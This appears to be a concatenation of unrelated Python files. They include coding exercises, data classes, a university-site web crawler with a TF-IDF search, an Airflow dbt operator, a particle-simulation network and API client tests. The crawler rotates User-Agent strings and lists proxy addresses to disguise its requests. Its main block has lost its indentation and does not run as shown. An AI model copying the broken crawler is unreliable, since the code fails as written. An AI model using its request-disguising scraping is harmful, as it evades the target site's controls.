# if ins != 0:
# cpi = cyc/float(ins)
#
# print("time %.9f, cpu %d, thread %d -> cpi %f" % (time/(float(1000000000)), cpu, thread, cpi))
| 2,444 | 894 |
# Task 2: swap the values of neighbouring list elements pairwise — indices
# 0 and 1, 2 and 3, and so on.  With an odd element count the last element
# stays in place.  The list is filled interactively via input().
my_list = []
list_len = input("Сколько элементов хотите ввести? ")
while (not list_len.isdecimal()) or int(list_len) == 0:
    list_len = input("Нужно ввести натуральное число! ")
list_len = int(list_len)
while len(my_list) < list_len:
    my_list.append(input("#"))
print(my_list)
# Walk the even indices that still have a right-hand neighbour.
for left in range(0, len(my_list) - 1, 2):
    my_list[left], my_list[left + 1] = my_list[left + 1], my_list[left]
print(my_list)
| 751 | 299 |
import os
import yaml
class ProjectData:
    """Lightweight record pairing a project name with its owning SIG."""

    def __init__(self, name, sig):
        self.name = name
        self.sig = sig
class RpmData:
    """Mutable record describing one RPM package and its metadata."""

    def __init__(self, name):
        self.name = name
        self.id = ''
        self.short_name = ''
        self.arch = ''
        self.group = ''
        self.description = ''
        self.requires = []
        self.provides = []
        self.oe_release = ''
        self.sig = ''
        self.project = ''

    def to_dict(self):
        """Return the serialisable attributes as a dict (``id`` is excluded)."""
        keys = ('name', 'short_name', 'arch', 'group', 'description',
                'requires', 'provides', 'oe_release', 'sig', 'project')
        return {key: getattr(self, key) for key in keys}
class SigData:
    """Aggregated metadata of one SIG (special interest group)."""

    def __init__(self, name):
        self.name = name
        self.mentors = []
        self.maintainers = []
        self.committers = []
        self.description = ''

    def to_dict(self):
        """Return the SIG attributes as a plain dict for serialisation."""
        sig_dict = {
            'name': self.name,
            'mentors': self.mentors,
            'maintainers': self.maintainers,
            'committers': self.committers,
            'description': self.description
        }
        return sig_dict

    def parse_sig_yaml(self, file_path):
        """Populate the record from a sig yaml file.

        Missing keys now fall back to the constructor defaults ('' / [])
        instead of None, so consumers can iterate the member lists safely.
        """
        with open(file_path, 'r') as sig_yaml:
            # safe_load is the shorthand for load(..., Loader=SafeLoader).
            yaml_data = yaml.safe_load(sig_yaml)
        self.description = yaml_data.get('description', '')
        self.mentors = yaml_data.get('mentors', [])
        self.maintainers = yaml_data.get('maintainers', [])
        self.committers = yaml_data.get('committers', [])
| 1,759 | 541 |
#!/usr/bin/env python3
import functools
def count_ways(coins, total):
    """Count the distinct combinations of (unlimited) coins summing to total."""
    n = len(coins)

    @functools.lru_cache(maxsize=None)
    def _ways_from(index, remaining):
        # Spend every multiple of coins[index] that fits into `remaining`,
        # delegating the rest to the next coin.
        coin = coins[index]
        return sum(ways(index + 1, left)
                   for left in range(remaining, -1, -coin))

    def ways(index, remaining):
        if remaining == 0:
            return 1
        if index == n:
            return 0
        return _ways_from(index, remaining)

    return ways(0, total)
def read_record(length):
    """Read one whitespace-separated line of ints; it must have `length` fields.

    Raises ValueError when the field count does not match.
    """
    values = [int(token) for token in input().split()]
    if len(values) != length:
        raise ValueError('wrong record length')
    return values
def run():
    """Read `total length` then the coin values, and print the way count."""
    total, length = read_record(2)
    print(count_ways(read_record(length), total))
if __name__ == '__main__':
    # Entry point when executed as a script.
    run()
| 812 | 279 |
import math
import random
import time
import re
from queue import Queue
import urllib.request
import urllib.error
import jieba
from bs4 import BeautifulSoup
# URLs already discovered (dedup) and the order they were fetched in.
urlSet = set()
urlList = []
# Counter of successfully saved pages; also names the output files.
doc = 0
# BFS frontier of URLs still to crawl.
que = Queue()
# A User-Agent is picked at random per request.
user_agents = [
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',
    'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
    'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0'
]
# Optional HTTP proxies; the installer below is currently disabled.
ipList = ["112.85.129.100:9999", "112.85.175.4:9999", "112.87.70.92:9999"]
# proxy_support = urllib.request.ProxyHandler({"http": random.choice(ipList)})
# opener = urllib.request.build_opener(proxy_support)
# urllib.request.install_opener(opener)
def get_html(url):
    """Fetch `url` with a random User-Agent and return the raw response bytes."""
    req = urllib.request.Request(url=url, headers={'User-Agent': random.choice(user_agents)})
    # Use the response as a context manager so the connection is always
    # closed (the previous code leaked it).
    with urllib.request.urlopen(req, timeout=1) as link:
        return link.read()
def getSave(url):
    """Crawl one page: queue its same-site links and save its visible text.

    Side effects: extends the global urlSet/que with newly found URLs and
    writes the extracted text to a file named after the global `doc` counter.
    """
    soup = BeautifulSoup(get_html(url), 'html.parser')  # parse with the stdlib parser
    # --- collect hyperlinks ---
    for a in soup.findAll('a', href=True):
        u = a.get("href")
        if not u or ('@suda.edu.cn' in u) or ("javascript" in u):
            continue
        if u[0:4] == "http" and "suda" not in u:
            # Off-site absolute link: skip it.  The original code used
            # `break` here, which silently dropped every remaining link
            # on the page as soon as one external link was met.
            continue
        if u[0:4] != "http":
            # Resolve relative links against the current page.
            if u[0] == '/':
                u = re.findall("http.*edu.cn", url)[0]+u
            else:
                site = re.findall("http.*/", url)[0]
                if site[-2] == '/':
                    site = re.findall("http.*/", url+'/')[0]
                u = site+u
        if u[-1] == '/':
            u = u[0:len(u)-1]
        if u not in urlSet:
            que.put(u)
            urlSet.add(u)
    # --- extract body text ---
    for script in soup.findAll('script'):
        script.extract()
    for style in soup.findAll('style'):
        style.extract()
    soup.prettify()
    content = re.sub("<[^>]*>", '', soup.prettify())
    content = re.sub(r"\s{2,}", "\n", content)
    with open("{}".format(doc), "w", encoding='utf-8') as f:
        f.write(content)
def search():
    """Prompt for a query and rank the crawled pages by cosine TF-IDF similarity."""
    query = input("网站爬取完毕,请输入查询:").split()  # read the query terms
    queryDict = {}  # term -> occurrence count within the query
    for i in query:
        if i in queryDict:
            queryDict[i] += 1
        else:
            queryDict[i] = 1
    queryDf = {i: 0 for i in queryDict}  # document frequency per query term; absent terms stay 0
    fenciDict = []  # per-document token counts (jieba segmentation)
    for i in range(len(urlList)):
        with open("{}".format(i), "r", encoding='utf-8') as f:
            s = f.read()
        fenci = jieba.lcut_for_search(s)
        fenciSet = set(fenci)
        fenciDict.append({i: fenci.count(i) for i in fenciSet})
        # Same counting approach as for the query above.
        for word in queryDf:
            if word in fenciDict[i]:
                queryDf[word] += 1
                # df grows by 1 when the term occurs in this document
    similarList = []
    for i in range(len(urlList)):
        sum_qd = 0.0  # numerator (dot product of the two weight vectors)
        sum_q2 = 0.0
        sum_d2 = 0.0  # sqrt(sum_q2 * sum_d2) is the denominator
        for word in queryDict:
            w_query = 1.0 + math.log10(queryDict[word])  # tf-idf weight of word in the query
            w_doc = 0  # tf-idf weight of word in document i
            if word in fenciDict[i]:
                # NOTE(review): 10000.0 is a hard-coded assumed corpus size.
                w_doc = (1.0 + math.log10(fenciDict[i][word])) * math.log10(10000.0 / queryDf[word])
            sum_qd += w_query * w_doc
            sum_q2 += w_query ** 2
            sum_d2 += w_doc ** 2
        similar = 0.0  # cosine similarity
        len_q2d2 = math.sqrt(sum_q2 * sum_d2)
        if math.fabs(len_q2d2) > 1e-5:
            similar = sum_qd / len_q2d2
        similarList.append((i, similar))  # (document index, cosine similarity)
    similarList.sort(key=lambda x: x[1], reverse=True)
    # Print the ten best-matching documents.
    for i in range(min(10,len(similarList))):
        d = similarList[i][0]
        print(urlList[d], similarList[i][1])
if __name__ == "__main__":
que.put("http://www.suda.edu.cn")
#while not que.empty():
for i in range(100): #可以选择for控制循环次数进行测试
url = que.get()
urlList.append(url)
#print(url) #打印出访问的网站
flag = False
for i in range(3): # 超时超过三次即认为访问失败
try:
getSave(url)
flag = True
break
except:
pass
if flag:
doc += 1
else:
#print("false") # 可体现出什么网站访问失败
pass
# 控制访问时间间隔,可调整
time.sleep(0.2)
if doc % 10 == 0:
time.sleep(1.5)
search()
| 4,686 | 1,995 |
import logging
import os
from typing import List, Dict
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.sensors.base_sensor_operator import apply_defaults
from dop.component.configuration.env import env_config
from dop.airflow_module.operator import dbt_operator_helper
# List of files generated by dbt docs generate
# https://docs.getdbt.com/reference/commands/cmd-docs
DBT_DOC_FILES = ["index.html", "manifest.json", "catalog.json"]
DBT_DOC_FOLDER = "target"
# User the dbt docker image runs as; in-pod paths live under its home dir.
DBT_USER = "dbtuser"
# Where dbt writes per-invocation run results, relative to the project dir.
DBT_RUN_RESULTS_PATH = "target/run_results.json"
# See: https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#affinity-and-anti-affinity
# Pins dbt pods onto the dedicated "kubernetes-task-pool" node pool.
node_pool_affinity = {
    "nodeAffinity": {
        # requiredDuringSchedulingIgnoredDuringExecution means in order
        # for a pod to be scheduled on a node, the node must have the
        # specified labels. However, if labels on a node change at
        # runtime such that the affinity rules on a pod are no longer
        # met, the pod will still continue to run on the node.
        "requiredDuringSchedulingIgnoredDuringExecution": {
            "nodeSelectorTerms": [
                {
                    "matchExpressions": [
                        {
                            # When nodepools are created in Google Kubernetes
                            # Engine, the nodes inside of that nodepool are
                            # automatically assigned the label
                            # 'cloud.google.com/gke-nodepool' with the value of
                            # the nodepool's name.
                            "key": "cloud.google.com/gke-nodepool",
                            "operator": "In",
                            "values": ["kubernetes-task-pool"],
                        }
                    ]
                }
            ]
        }
    }
}
def retrieve_commit_hash():
    """Return the build commit hash recorded in the project's `.commit-hash` file."""
    commit_file = os.path.sep.join([env_config.service_project_path, ".commit-hash"])
    with open(commit_file) as fp:
        return fp.read()
class DbtK8Operator(KubernetesPodOperator):
    """Airflow operator that runs a dbt command inside a Kubernetes pod and
    copies dbt's run_results.json (and, for docs builds, the doc files) to GCS.
    """

    # Fields rendered through Airflow templating before execution.
    template_fields = (
        "action",
        "target",
        "dbt_project_name",
        "image_tag",
        "dbt_arguments",
        "gcr_pull_secret_name",
        "arguments",
    )
    ui_color = "#FF694B"

    @apply_defaults
    def __init__(
        self,
        dbt_project_name: str,
        dbt_version: str,
        dbt_arguments: List[Dict],
        *args,
        **kwargs,
    ):
        """
        :param dbt_project_name: the name for the dbt project name inline with what's defined in `.dbt-project-repos.json`
        :param dbt_version: Not used
        :param args:
        :param kwargs: must contain the Task entity
        """
        task = kwargs["task"]
        self.dbt_project_name = dbt_project_name
        self.dbt_version = "N/A, this is fixed in the docker image"
        self.action = task.kind.action
        self.target = task.kind.target
        self.dbt_arguments = dbt_arguments
        self.gcr_pull_secret_name = env_config.gcr_pull_secret_name
        # Image tag is the commit hash baked into the build (see retrieve_commit_hash).
        self.image_tag = retrieve_commit_hash()
        self._full_refresh = (
            False  # used to trigger DBT full refresh, modified via execute() override
        )
        # Initial command; rebuilt in execute() once the runtime context is known.
        self.arguments = [self.parse_bash_command()]
        super(DbtK8Operator, self).__init__(
            name=kwargs["task_id"],
            cmds=["/bin/bash", "-c"],
            arguments=self.arguments,
            get_logs=True,
            namespace="default",
            image=f"eu.gcr.io/{env_config.infra_project_id}/dop-dbt:{self.image_tag}",
            is_delete_operator_pod=True,
            env_vars={
                "DOP_PROJECT_ID": env_config.project_id,
                "DOP_LOCATION": env_config.location,
            },
            image_pull_secrets=self.gcr_pull_secret_name,
            affinity=node_pool_affinity,
            *args,
            **kwargs,
        )

    def execute(self, context):
        """
        Override the parent method to ingest required contexts
        """
        # A manual trigger may pass {"full_refresh": true} via dag_run conf.
        dag_run_conf = context["dag_run"].conf if context["dag_run"].conf else {}
        full_refresh = dag_run_conf.get("full_refresh", False)
        self._full_refresh = full_refresh
        logging.info(f"### IS FULL REFRESH ENABLED: {self._full_refresh}")
        # Rebuild the bash command now that the Airflow context is available.
        self.arguments = [self.parse_bash_command(context=context)]
        logging.info(f"### Updated arguments: {self.arguments}")
        super(DbtK8Operator, self).execute(context=context)

    def parse_bash_command(self, context=None):
        """Assemble the bash command that runs dbt in the pod and uploads
        run_results.json to GCS; docs builds also copy the doc files."""
        full_refresh_cmd = ""
        if self.target != "run":
            # --full-refresh only applies to `dbt run`.
            full_refresh_cmd = ""
        elif self.dbt_arguments:
            # Avoid duplicating the flag when the task already passes it.
            if self._full_refresh and "--full-refresh" not in [
                arg.get("option") for arg in self.dbt_arguments
            ]:
                full_refresh_cmd = "--full-refresh"
        elif self._full_refresh:
            full_refresh_cmd = "--full-refresh"
        cmd_for_additional_arguments = ""
        # docs arguments are only used to copy files to GCS, not in the task execution
        if self.dbt_arguments and self.target != "docs generate":
            cmd_for_additional_arguments = dbt_operator_helper.implode_arguments(
                dbt_arguments=self.dbt_arguments
            )
        cmd_to_run_dbt = (
            f"pipenv run dbt --no-use-colors {self.target} --project-dir ./{self.dbt_project_name}"
            f" --vars {dbt_operator_helper.parsed_cmd_airflow_context_vars(context=context)}"
            f" {cmd_for_additional_arguments}"
            f" {full_refresh_cmd};"
            f" gsutil cp /home/{DBT_USER}/{self.dbt_project_name}/{DBT_RUN_RESULTS_PATH} gs://{os.getenv('GCS_BUCKET')}/dbt/{DBT_RUN_RESULTS_PATH}"
        )
        if self.target == "docs generate":
            command = self.copy_docs_to_gcs_command()
            if command:
                cmd_to_run_dbt += f"; {command}"
        return cmd_to_run_dbt

    def copy_docs_to_gcs_command(self):
        """
        Generate gsutil command line to copy doc files generated with dbt docs generate to GCS
        """
        command = []
        gcs_bucket = dbt_operator_helper.extract_argument(
            self.dbt_arguments, "--bucket"
        )
        if not gcs_bucket:
            logging.warning("No bucket argument provided. Skipping copy to GCS")
            return ""
        gcs_path = dbt_operator_helper.extract_argument(
            self.dbt_arguments, "--bucket-path", ""
        )
        for doc_file in DBT_DOC_FILES:
            doc_file_path = (
                f"/home/{DBT_USER}/{self.dbt_project_name}/{DBT_DOC_FOLDER}/{doc_file}"
            )
            logging.info(f"Copying {doc_file} to gs://{gcs_bucket}/{gcs_path}")
            command.append(
                f"gsutil cp {doc_file_path} gs://{gcs_bucket}/{gcs_path}/{doc_file}"
            )
        return ";".join(command)

    def post_execute(self, context, result=None):
        """
        This hook is triggered right after self.execute() is called.
        It is passed the execution context and any results returned by the
        operator.
        """
        # Persist the run results (uploaded by the pod) into BigQuery.
        dbt_operator_helper.save_run_results_in_bq(
            env_config.project_id,
            self.dbt_project_name,
            f"gs://{os.getenv('GCS_BUCKET')}/dbt/{DBT_RUN_RESULTS_PATH}",
        )
| 7,398 | 2,215 |
"""
birthday.py
Author: Jordan
Credit: none
Assignment:
Your program will ask the user the following questions, in this order:
1. Their name.
2. The name of the month they were born in (e.g. "September").
3. The year they were born in (e.g. "1962").
4. The day they were born on (e.g. "11").
If the user's birthday fell on October 31, then respond with:
You were born on Halloween!
If the user's birthday fell on today's date, then respond with:
Happy birthday!
Otherwise respond with a statement like this:
Peter, you are a winter baby of the nineties.
Example Session
Hello, what is your name? Eric
Hi Eric, what was the name of the month you were born in? September
And what year were you born in, Eric? 1972
And the day? 11
Eric, you are a fall baby of the stone age.
"""
name = str(input("Hello, what is your name? "))
month = str(input("Hi " + name + ", what was the name of the month you were born in? "))
year = int(input("And what year were you born in, " + name + "? "))
day = int(input("And the day? "))

# Index 0 is a placeholder so months[1] == "January" ... months[12] == "December".
# (A stray '' literal that silently concatenated onto "December" was removed.)
months = ["", "January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]
winter = ["December", "January", "February"]
spring = ['March', 'May', 'April']
summer = ['June', 'July', 'August']
fall = ['September', 'October', 'November']

from datetime import datetime
from calendar import month_name  # NOTE(review): unused — candidate for removal

todaymonth = datetime.today().month
todaydate = datetime.today().day

if month == months[todaymonth] and day == todaydate:
    # A birthday today outranks the Halloween message, as before.
    print("Happy birthday!")
elif month == "October" and day == 31:
    print("You were born on Halloween!")
else:
    # Resolve the season once instead of repeating it in sixteen branches.
    season = None
    for candidate, season_months in (("winter", winter), ("spring", spring),
                                     ("summer", summer), ("fall", fall)):
        if month in season_months:
            season = candidate
            break
    if season is not None:
        # Decade boundaries match the original chain exactly:
        # 2000+ -> two thousands, 1990-1999 -> nineties,
        # 1980-1989 -> eighties, earlier -> Stone Age.
        if year >= 2000:
            era = "two thousands"
        elif year >= 1990:
            era = "nineties"
        elif year >= 1980:
            era = "eighties"
        else:
            era = "Stone Age"
        print(name + ", you are a " + season + " baby of the " + era + ".")
    # An unrecognised month name prints nothing, matching the old behaviour.
| 3,471 | 1,172 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from config import _C as C
from models.layers.GNN_dmwater import GraphNet
from scipy import spatial
import numpy as np
import utils
class Net(nn.Module):
    """Graph-network particle simulator.

    Encodes per-particle node features and radius-neighbourhood edges,
    runs a message-passing GNN, decodes per-particle accelerations and
    integrates them to roll out predicted positions.
    """

    def __init__(self):
        super(Net, self).__init__()
        self.node_dim_in = C.NET.NODE_FEAT_DIM_IN
        self.edge_dim_in = C.NET.EDGE_FEAT_DIM_IN
        self.hidden_size = C.NET.HIDDEN_SIZE
        self.out_size = C.NET.OUT_SIZE
        num_layers = C.NET.GNN_LAYER
        # Learned embedding of the discrete particle-type id.
        self.particle_emb = nn.Embedding(C.NUM_PARTICLE_TYPES, C.NET.PARTICLE_EMB_SIZE)
        # Node/edge encoders: 3-layer MLPs followed by LayerNorm.
        self.node_encoder = nn.Sequential(
            nn.Linear(self.node_dim_in, self.hidden_size),
            nn.ReLU(),
            nn.Linear(self.hidden_size, self.hidden_size),
            nn.ReLU(),
            nn.Linear(self.hidden_size, self.hidden_size),
            nn.LayerNorm(self.hidden_size)
        )
        self.edge_encoder = nn.Sequential(
            nn.Linear(self.edge_dim_in, self.hidden_size),
            nn.ReLU(),
            nn.Linear(self.hidden_size, self.hidden_size),
            nn.ReLU(),
            nn.Linear(self.hidden_size, self.hidden_size),
            nn.LayerNorm(self.hidden_size)
        )
        self.graph = GraphNet(layers=num_layers)
        # Decoder maps node latents to the output (acceleration) vector.
        self.decoder = nn.Sequential(
            nn.Linear(self.hidden_size, self.hidden_size),
            nn.ReLU(),
            nn.Linear(self.hidden_size, self.hidden_size),
            nn.ReLU(),
            nn.Linear(self.hidden_size, self.out_size),
        )

    def _construct_graph_nodes(self, poss, particle_type, metadata):
        """Build per-particle node features: normalised velocity history,
        clipped wall distances and the particle-type embedding.

        Assumes poss is (num_particles, C.N_HIS, dim) — the assert below
        pins the history axis; confirm the leading axis against callers.
        """
        vels = utils.time_diff(poss)
        vels = (vels - metadata['vel_mean'])/metadata['vel_std']
        n_vel, d_vel = vels.shape[1], vels.shape[2]
        assert n_vel == C.N_HIS - 1
        # Flatten the velocity history into one feature vector per particle.
        vels = vels.reshape([-1, n_vel*d_vel])
        pos_last = poss[:, -1]
        # Signed distance to each domain wall, scaled by the interaction
        # radius and clipped to [-1, 1].
        dist_to_walls = torch.cat(
            [pos_last - metadata['bounds'][:, 0],
            -pos_last + metadata['bounds'][:, 1]], 1)
        dist_to_walls = torch.clip(dist_to_walls/C.NET.RADIUS, -1, 1)
        type_emb = self.particle_emb(particle_type)
        node_attr = torch.cat([vels,
                               dist_to_walls,
                               type_emb], axis=1)
        return node_attr

    def _construct_graph_edges(self, pos):
        """Connect particle pairs within C.NET.RADIUS and build edge features.

        Returns (edges, senders, receivers, collapsed); `collapsed` flags a
        degenerate state where the edge count explodes during rollout.
        """
        device = pos.device
        collapsed = False
        n_particles = pos.shape[0]
        # Calculate undirected edge list using KDTree
        point_tree = spatial.cKDTree(pos.detach().cpu().numpy())
        undirected_pairs = np.array(list(point_tree.query_pairs(C.NET.RADIUS, p=2))).T
        undirected_pairs = torch.from_numpy(undirected_pairs).to(device)
        # Duplicate each undirected pair in both directions.
        pairs = torch.cat([undirected_pairs, torch.flip(undirected_pairs, dims=(0,))], dim=1).long()
        if C.NET.SELF_EDGE:
            self_pairs = torch.stack([torch.arange(n_particles, device=device),
                                      torch.arange(n_particles, device=device)])
            pairs = torch.cat([pairs, self_pairs], dim=1)
        # check if prediction collapsed in long term unrolling
        if pairs.shape[1] > C.NET.MAX_EDGE_PER_PARTICLE * n_particles:
            collapsed = True
        senders = pairs[0]
        receivers = pairs[1]
        # Calculate corresponding relative edge attributes (distance vector + magnitude)
        dist_vec = (pos[senders] - pos[receivers])
        dist_vec = dist_vec / C.NET.RADIUS
        dist = torch.linalg.norm(dist_vec, dim=1, keepdims=True)
        edges = torch.cat([dist_vec, dist], dim=1)
        return edges, senders, receivers, collapsed

    def forward(self, poss, particle_type, metadata, nonk_mask, tgt_poss, num_rollouts=10, phase='train'):
        """Autoregressively roll out `num_rollouts` steps; returns normalised
        accelerations, predicted positions and a collapse flag."""
        pred_accns = []
        pred_poss = []
        for i in range(num_rollouts):
            nodes = self._construct_graph_nodes(poss, particle_type, metadata)
            edges, senders, receivers, collapsed = self._construct_graph_edges(poss[:, -1])
            nodes = self.node_encoder(nodes)
            edges = self.edge_encoder(edges)
            nodes, edges = self.graph(nodes, edges, senders, receivers)
            pred_accn = self.decoder(nodes)
            # De-normalise the predicted acceleration.
            pred_acc = pred_accn * metadata['acc_std'] + metadata['acc_mean']
            pred_accns.append(pred_accn)
            # Semi-implicit Euler step: keep previous velocity, add acceleration.
            prev_vel = poss[:, -1] - poss[:, -2]
            pred_pos = poss[:, -1] + prev_vel + pred_acc
            # replace kinematic nodes
            pred_pos = torch.where(nonk_mask[:, None].bool(), pred_pos, tgt_poss[:, i])
            # Slide the position-history window forward by one step.
            poss = torch.cat([poss[:, 1:], pred_pos[:, None]], dim=1)
            pred_poss.append(pred_pos)
            if collapsed:
                break
        pred_accns = torch.stack(pred_accns).permute(1, 0, 2)
        pred_poss = torch.stack(pred_poss).permute(1, 0, 2)
        outputs = {
            'pred_accns': pred_accns,
            'pred_poss': pred_poss,
            'pred_collaposed': collapsed
        }
        return outputs
| 5,093 | 1,749 |
from tensorflow import keras
import numpy as np
# Toy regression data: y = 3x + 2 plus gaussian noise.
data_x = np.random.normal(size=[1000, 1])
noise = np.random.normal(size=[1000, 1]) * 0.2
data_y = data_x * 3. + 2. + noise
train_x, train_y = data_x[:900], data_y[:900]
test_x, test_y = data_x[900:], data_y[900:]

# A layer created once at module scope is shared by every model that uses it.
l1 = keras.layers.Dense(10, activation=keras.activations.relu)


class Model(keras.Model):
    """Two-layer MLP whose first layer is the shared module-level `l1`."""

    def __init__(self):
        super(Model, self).__init__()
        self.l1 = l1                      # shared across Model instances
        self.l2 = keras.layers.Dense(1)   # private to each instance

    def call(self, x, training=None, mask=None):
        return self.l2(self.l1(x))


model1 = Model()
model2 = Model()
model1.build((None, 1))
model2.build((None, 1))
model1.compile(
    optimizer=keras.optimizers.SGD(0.01),
    loss=keras.losses.MeanSquaredError(),
    metrics=[keras.metrics.MeanSquaredError()],
)
# Training model1 also updates l1 as seen by model2, but not model2.l2.
model1.fit(train_x, train_y, batch_size=32, epochs=3, validation_split=0.2, shuffle=True)
print("l1 is reused: ", np.all(model1.l1.get_weights()[0] == model2.l1.get_weights()[0]))
print("l2 is reused: ", np.all(model1.l2.get_weights()[0] == model2.l2.get_weights()[0]))
import colorama
def stringify(obj):
    """Coerce obj to str (no-op when it already is one)."""
    if not isinstance(obj, str):
        obj = str(obj)
    return obj


def _colorize(fore_color, obj):
    # "\033[39m" resets the foreground to the terminal default (the same
    # byte sequence as colorama.Fore.RESET).  One helper replaces the
    # identical body previously duplicated in every color function.
    return fore_color + stringify(obj) + "\033[39m"


def red(obj):
    return _colorize(colorama.Fore.RED, obj)


def cyan(obj):
    return _colorize(colorama.Fore.CYAN, obj)


def green(obj):
    return _colorize(colorama.Fore.GREEN, obj)


def yellow(obj):
    return _colorize(colorama.Fore.YELLOW, obj)


def magenta(obj):
    return _colorize(colorama.Fore.MAGENTA, obj)


def white(obj):
    return _colorize(colorama.Fore.WHITE, obj)


def pink(obj):
    """Alias for magenta."""
    return magenta(obj)
| 624 | 271 |
"""Export data"""
from scipy.io import savemat
def mat(filename, mdict):
    """Export dictionary to .mat file for MATLAB.

    Thin wrapper over scipy.io.savemat: each key of `mdict` becomes a
    MATLAB variable written into `filename`.
    """
    savemat(filename, mdict)
| 158 | 54 |
# Copyright 1999-2009 University of Chicago
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Object definition for processing C WS Core (version 2) usage packets.
"""
from globus.usage.cwscorev1packet import CWSCoreV1Packet
class CWSCoreV2Packet(CWSCoreV1Packet):
    """
    C WS Core Usage Packet (version 2).

    Extends version 1 with a container id, a start/stop event type and
    the list of deployed services.
    """

    insert_statement = '''
            INSERT INTO c_ws_core_packets(
                component_code,
                version_code,
                send_time,
                ip_address,
                container_id,
                event_type,
                service_list)
            VALUES (%s, %s, %s, %s, %s, %s, %s)'''

    def values(self, dbclass):
        """
        Build the bind-value tuple matching insert_statement.

        Arguments:
        self -- A CWSCoreV2Packet object
        dbclass -- Database driver module for driver-specific type bindings

        Returns a tuple containing
        (component_code, version_code, send_time, ip_address,
         container_id, event_type, service_list).
        """
        send_timestamp = dbclass.Timestamp(*self.send_time)
        return (self.component_code,
                self.packet_version,
                send_timestamp,
                self.ip_address,
                self.data.get('ID'),
                self.data.get('EVENT'),
                self.data.get('SERVICES'))
| 1,932 | 560 |
import pytest
from unittest.mock import patch, AsyncMock, create_autospec, MagicMock
from mindsync.api import AsyncApi, MindsyncApiError, DEFAULT_BASE_URL
from aiohttp import ClientResponse, ClientConnectionError, FormData
from io import IOBase
# Canned fixture values shared by the fixtures and tests below.
API_KEY = 'an-api-key'
USER_ID = 'an-user-id'
RESPONSE_RV = dict(result=dict(first_name='Elvis', last_name='Presley'), whatever='whatever')
ERROR_RESPONSE_RV = dict(error=dict(code=400, name='StatusError', message='Something wrong happens'), result=None, whatever='whatever')
RIG_ID = 'a-rig-id'
API_VERSION = '1.0'
PROXY_URL = 'http://localhost:8080'
SOME_FN = 'filename.py'
CODE_ID = 'code-id'
# RENT_ID was previously assigned twice ('a-rent-id', then 'rent-id');
# the dead first assignment was removed, keeping the effective value.
RENT_ID = 'rent-id'
UUID = 'uuid'
@pytest.fixture
def api_key():
    """API key handed to every client under test."""
    return API_KEY


@pytest.fixture
def sut(api_key):
    """System under test: client that reports errors via the parsed payload."""
    return AsyncApi(api_key)


@pytest.fixture
def raise_sut(api_key):
    """Client configured to raise MindsyncApiError on error responses."""
    return AsyncApi(api_key, raise_for_error=True)


@pytest.fixture
def resp_mock():
    """ClientResponse double whose json() yields a successful payload."""
    response = create_autospec(spec=ClientResponse, spec_set=True, instance=True)
    response.json.return_value = RESPONSE_RV
    return response


@pytest.fixture
def err_resp_mock():
    """ClientResponse double whose json() yields an error payload."""
    response = create_autospec(spec=ClientResponse, spec_set=True, instance=True)
    response.json.return_value = ERROR_RESPONSE_RV
    return response
@pytest.fixture
def open_mock():
    """Patch builtins.open for the duration of the test."""
    with patch('builtins.open') as patched:
        yield patched


class FormDataMatcher(FormData):
    """FormData that compares equal by field content, for assert_called_with."""

    def __eq__(self, other):
        return self._fields == other._fields


@pytest.fixture
def form_data(open_mock):
    """Multipart body expected by the code-upload endpoints."""
    expected = FormDataMatcher()
    expected.add_field('file', open_mock.return_value, content_type='application/octet-stream')
    expected.add_field('isPrivate', 'false')
    return expected


@pytest.fixture
def aiohttp_request_mock(resp_mock):
    """Patch aiohttp.request so its async context manager yields resp_mock."""
    with patch('aiohttp.request') as patched:
        patched.return_value.__aenter__.return_value = resp_mock
        yield patched


@pytest.fixture
def err_aiohttp_request_mock(err_resp_mock):
    """Patch aiohttp.request so its async context manager yields err_resp_mock."""
    with patch('aiohttp.request') as patched:
        patched.return_value.__aenter__.return_value = err_resp_mock
        yield patched
@pytest.mark.asyncio
@pytest.mark.parametrize('user_id, url, kwargs, expected_result',
    [(None, f'{DEFAULT_BASE_URL}/api/1.0/users/client/profile', dict(), RESPONSE_RV['result']),
     (USER_ID, f'{DEFAULT_BASE_URL}/api/1.0/users/profile/{USER_ID}', dict(meta=None), RESPONSE_RV)])
async def test_profile_must_do_proper_http_request(sut, user_id, url, kwargs, expected_result, api_key, aiohttp_request_mock):
    # Without a user id the client hits its own profile endpoint and unwraps
    # 'result'; with meta=None the raw payload is returned unmodified.
    result = await sut.profile(user_id, **kwargs)
    assert expected_result == result
    aiohttp_request_mock.assert_called_with(method='GET', url=url, proxy=None,
                                            headers={'api-key': api_key}, raise_for_status=False)


@pytest.mark.asyncio
async def test_profile_must_raise_if_request_fails(sut, aiohttp_request_mock):
    # Transport-level failures must be wrapped into MindsyncApiError.
    aiohttp_request_mock.side_effect = ClientConnectionError
    with pytest.raises(MindsyncApiError):
        await sut.profile()


@pytest.mark.asyncio
async def test_profile_must_raise_if_result_is_malformed(sut, resp_mock, aiohttp_request_mock):
    # A payload without a 'result' key must be rejected.
    resp_mock.json.return_value = dict()
    with pytest.raises(MindsyncApiError):
        await sut.profile()


@pytest.mark.asyncio
@pytest.mark.parametrize('args, expected_args', [(dict(first_name='Jim', last_name='Carrey', phone='1234567'),
                                                  dict(lastName='Carrey', firstName='Jim', phone='1234567'))])
async def test_set_profile_must_do_proper_http_request(sut, args, expected_args, api_key,
                                                       aiohttp_request_mock, resp_mock):
    # snake_case kwargs must be converted to the API's camelCase before the PUT.
    resp_mock.json.return_value = dict(result='OK')
